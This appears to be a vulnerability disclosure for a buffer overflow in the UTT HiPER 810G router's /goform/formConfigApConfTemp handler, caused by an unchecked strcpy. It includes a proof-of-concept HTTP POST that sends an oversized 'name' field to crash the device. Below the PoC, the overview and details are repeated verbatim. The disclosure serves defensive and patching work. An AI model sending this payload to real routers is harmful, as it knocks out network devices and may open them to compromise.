Information
Vendor of the products: UTT
Vendor's website: UTT艾泰-专业路由器、交换机、防火墙品牌
Affected products: HiPER 810G
Affected firmware version: <=v3v1.7.7-171114
Firmware download address: UTT艾泰-专业路由器、交换机、防火墙品牌
Overview
A serious buffer overflow vulnerability was found on the UTT router Aggressive HiPER 810G router, where an attacker could trigger the vulnerability by routing /goform/formConfigApConfTemp, causing buffer overflow attacks and denial of service attacks, etc., specifically through " strcpy((char *)(InstPointByName_1 + 36), src);" to be realized
Vulnerability details
The API for invoking the function
Here you can find that src and v81 have taken the value, and then judge whether the value of v81 is add, if not, enter the branch, and enter the branch here
Here the src is copied directly, causing the buffer overflow
POC
POST /goform/formConfigApConfTemp HTTP/1.1
Host: 192.168.1.1
Content-Length: 1822
Cache-Control: max-age=0
Authorization: Digest username="admin", realm="UTT", nonce="80758026511134abc9038ea9363e038c", uri="/goform/formArpBindGlobalConfig", algorithm=MD5, response="3c90b3b4d198905f88cf1301ff8ad6b5", opaque="5ccc069c403ebaf9f0171e9517f40e41", qop=auth, nc=000001a1, cnonce="71e33390dc75c484"
Origin: http://192.168.1.1
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.1.1/IPMac.asp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: language=zhcn; utt_bw_rdevType=; td_cookie=2522114788
Connection: close
action=del&name=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Information
Vendor of the products: UTT
Vendor's website: UTT艾泰-专业路由器、交换机、防火墙品牌
Affected products: HiPER 810G
Affected firmware version: <=v3v1.7.7-171114
Firmware download address: UTT艾泰-专业路由器、交换机、防火墙品牌
Overview
A serious buffer overflow vulnerability was found on the UTT router Aggressive HiPER 810G router, where an attacker could trigger the vulnerability by routing /goform/formConfigApConfTemp, causing buffer overflow attacks and denial of service attacks, etc., specifically through " strcpy((char *)(InstPointByName_1 + 36), src);" to be realized
Vulnerability details
The API for invoking the function
Here you can find that src and v81 have taken the value, and then judge whether the value of v81 is add, if not, enter the branch, and enter the branch here
Here the src is copied directly, causing the buffer overflow
POC